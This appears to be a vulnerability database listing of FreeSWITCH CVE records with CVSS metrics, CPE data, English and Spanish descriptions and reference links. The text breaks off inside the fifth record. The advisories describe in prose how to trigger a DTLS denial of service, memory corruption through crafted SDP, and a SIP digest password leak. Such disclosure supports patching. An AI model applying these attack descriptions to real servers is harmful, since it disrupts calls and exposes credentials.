Search criteria
46 vulnerabilities found for freeswitch by freeswitch
FKIE_CVE-2023-51443
Vulnerability from fkie_nvd - Published: 2023-12-27 17:15 - Updated: 2025-11-04 19:16
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D602178F-BD2F-4B3D-97D9-7555182A7015",
"versionEndExcluding": "1.10.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check."
},
{
"lang": "es",
"value": "FreeSWITCH es un Software Defined Telecom Stack que permite la transformaci\u00f3n digital de conmutadores de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. Antes de la versi\u00f3n 1.10.11, cuando se maneja DTLS-SRTP para la configuraci\u00f3n de medios, FreeSWITCH es susceptible a una denegaci\u00f3n de servicio debido a una condici\u00f3n de ejecuci\u00f3n en la fase de handshake del protocolo DTLS. Este ataque se puede realizar de forma continua, negando as\u00ed nuevas llamadas cifradas DTLS-SRTP durante el ataque. Si un atacante logra enviar un mensaje DTLS ClientHello con un CipherSuite no v\u00e1lido (como `TLS_NULL_WITH_NULL_NULL`) al puerto en el servidor FreeSWITCH que espera paquetes de la persona que llama, se genera un error DTLS. Esto da como resultado la cancelaci\u00f3n de la sesi\u00f3n de medios, a la que sigue tambi\u00e9n la cancelaci\u00f3n a nivel de se\u00f1alizaci\u00f3n (SIP). El abuso de esta vulnerabilidad puede provocar una denegaci\u00f3n de servicio masiva en servidores FreeSWITCH vulnerables para llamadas que dependen de DTLS-SRTP. Para abordar esta vulnerabilidad, actualice FreeSWITCH a 1.10.11, que incluye la soluci\u00f3n de seguridad. La soluci\u00f3n implementada es descartar todos los paquetes de direcciones que no hayan sido validadas por una verificaci\u00f3n ICE."
}
],
"id": "CVE-2023-51443",
"lastModified": "2025-11-04T19:16:21.660",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-27T17:15:08.093",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/176311/FreeSWITCH-1.10.10-Denial-Of-Service.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2023/Dec/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-703"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-40019
Vulnerability from fkie_nvd - Published: 2023-09-15 20:15 - Updated: 2024-11-21 08:18
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5FBCE979-CA36-45E2-B9DE-11B260D2AB19",
"versionEndExcluding": "1.10.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue."
},
{
"lang": "es",
"value": "FreeSWITCH es una pila de telecomunicaciones definida por software que permite la transformaci\u00f3n digital de switches de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. Antes de la versi\u00f3n 1.10.10, FreeSWITCH permit\u00eda a los usuarios autorizados provocar un ataque de denegaci\u00f3n de servicio enviando un nuevo INVITE con SDP que conten\u00eda nombres de c\u00f3dec duplicados. Cuando una llamada en FreeSWITCH completa la negociaci\u00f3n del c\u00f3dec, la variable de canal `codec_string` se configura con el resultado de la negociaci\u00f3n. En una renegociaci\u00f3n posterior, si se ofrece un SDP que contiene c\u00f3decs con los mismos nombres pero con diferentes formatos, es posible que FreeSWITCH detecte demasiadas coincidencias de c\u00f3decs, lo que provocar\u00e1 desbordamientos de sus matrices internas. Al abusar de esta vulnerabilidad, un atacante puede corromper la pila de FreeSWITCH, lo que provoca un comportamiento indefinido del sistema o simplemente bloquearlo. La versi\u00f3n 1.10.10 contiene un parche para este problema."
}
],
"id": "CVE-2023-40019",
"lastModified": "2024-11-21T08:18:31.530",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-09-15T20:15:09.637",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-40018
Vulnerability from fkie_nvd - Published: 2023-09-15 20:15 - Updated: 2024-11-21 08:18
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5FBCE979-CA36-45E2-B9DE-11B260D2AB19",
"versionEndExcluding": "1.10.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue."
},
{
"lang": "es",
"value": "FreeSWITCH es una pila de telecomunicaciones definida por software que permite la transformaci\u00f3n digital de switches de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. Antes de la versi\u00f3n 1.10.10, FreeSWITCH permit\u00eda a los usuarios remotos activar escritura fuera de l\u00edmites ofreciendo un candidato ICE con un ID de componente desconocido. Cuando se ofrece un SDP con candidatos ICE con un ID de componente desconocido, FreeSWITCH realizar\u00e1 una escritura fuera de l\u00edmites en sus matrices. Al abusar de esta vulnerabilidad, un atacante puede corromper la memoria de FreeSWITCH, lo que provoca un comportamiento indefinido del sistema o un bloqueo del mismo. La versi\u00f3n 1.10.10 contiene un parche para este problema."
}
],
"id": "CVE-2023-40018",
"lastModified": "2024-11-21T08:18:31.417",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-09-15T20:15:09.447",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2021-41158
Vulnerability from fkie_nvd - Published: 2021-10-26 14:15 - Updated: 2024-11-21 06:25
Severity ?
5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | http://seclists.org/fulldisclosure/2021/Oct/40 | Mailing List, Patch, Third Party Advisory | |
| security-advisories@github.com | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| security-advisories@github.com | https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2021/Oct/40 | Mailing List, Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/releases/tag/v1.10.7 | Release Notes, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4 | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC84E752-644B-4E28-8E03-DA7B5C9C2521",
"versionEndExcluding": "1.10.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges."
},
{
"lang": "es",
"value": "FreeSWITCH es una Pila de Telecomunicaciones Definida por Software que permite la transformaci\u00f3n digital de los switches de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. En versiones anteriores a 1.10.7, un atacante puede llevar a cabo un ataque de filtrado de compendio SIP contra FreeSWITCH y recibir la respuesta de desaf\u00edo de una pasarela configurada en el servidor FreeSWITCH. Esto es realizado al desafiar las peticiones SIP de FreeSWITCH con el reino configurado como el de la pasarela, forzando as\u00ed a FreeSWITCH a responder con la respuesta de desaf\u00edo que es basada en la contrase\u00f1a de esa pasarela objetivo. El abuso de esta vulnerabilidad permite a atacantes recuperar potencialmente las contrase\u00f1as de la puerta de enlace llevando a cabo un r\u00e1pido ataque de descifrado de contrase\u00f1as fuera de l\u00ednea en la respuesta de desaf\u00edo. El atacante no requiere privilegios de red especiales, como la capacidad de husmear el tr\u00e1fico de red de FreeSWITCH, para explotar este problema. En cambio, lo que es requerido para que este ataque funcione es la capacidad de causar que el servidor v\u00edctima env\u00ede mensajes de petici\u00f3n SIP a la parte maliciosa. Adem\u00e1s, para explotar este problema, el atacante necesita especificar el reino correcto, que en algunos casos podr\u00eda considerarse secreto. Sin embargo, como muchas pasarelas son realmente p\u00fablicas, esta informaci\u00f3n puede ser f\u00e1cilmente recuperada. La vulnerabilidad parece deberse al c\u00f3digo que maneja los retos en \"sofia_reg.c\", \"sofia_reg_handle_sip_r_challenge()\" que no comprueba si el reto se origina en la pasarela real. La falta de estas comprobaciones permite que UACs arbitrarias (y pasarelas) desaf\u00eden cualquier petici\u00f3n enviada por FreeSWITCH con el reino de la pasarela a la que se dirige. Este problema est\u00e1 parcheado en la versi\u00f3n 10.10.7. Los mantenedores recomiendan que se cree una asociaci\u00f3n entre una sesi\u00f3n SIP para cada pasarela y su reino para hacer una comprobaci\u00f3n de esta asociaci\u00f3n cuando se responda a los desaf\u00edos"
}
],
"id": "CVE-2021-41158",
"lastModified": "2024-11-21T06:25:37.550",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-10-26T14:15:08.007",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-346"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-41157
Vulnerability from fkie_nvd - Published: 2021-10-26 14:15 - Updated: 2024-11-21 06:25
Severity ?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| freeswitch | freeswitch | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8E0DCFCA-5CA9-43A1-9E2E-C94037099901",
"versionEndExcluding": "1.10.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication."
},
{
"lang": "es",
"value": "FreeSWITCH es una Pila de Telecomunicaciones Definida por Software que permite la transformaci\u00f3n digital de los switches de telecomunicaciones propietarios a una implementaci\u00f3n de software que se ejecuta en cualquier hardware b\u00e1sico. Por defecto, las peticiones SIP del tipo SUBSCRIBE no son autenticadas en las versiones afectadas de FreeSWITCH. El abuso de este problema de seguridad permite a atacantes suscribirse a las notificaciones de eventos del agente de usuario sin necesidad de autenticarse. Este abuso plantea problemas de privacidad y podr\u00eda conllevar a ataques de ingenier\u00eda social o similares. Por ejemplo, los atacantes pueden ser capaces de monitorear el estado de las extensiones SIP objetivo. Aunque este problema es corregido en la versi\u00f3n v1.10.6, las instalaciones actualizadas a la versi\u00f3n corregida de FreeSWITCH desde una versi\u00f3n anterior, pueden seguir siendo vulnerables si la configuraci\u00f3n no es actualizada en consecuencia. Las actualizaciones de software no actualizan la configuraci\u00f3n por defecto. Los mensajes SIP SUBSCRIBE deber\u00edan ser autenticados por defecto para que los administradores de FreeSWITCH no necesiten establecer expl\u00edcitamente el par\u00e1metro \"auth-subscriptions\". Cuando es seguida esta recomendaci\u00f3n, es posible introducir un nuevo par\u00e1metro para deshabilitar expl\u00edcitamente la autenticaci\u00f3n"
}
],
"id": "CVE-2021-41157",
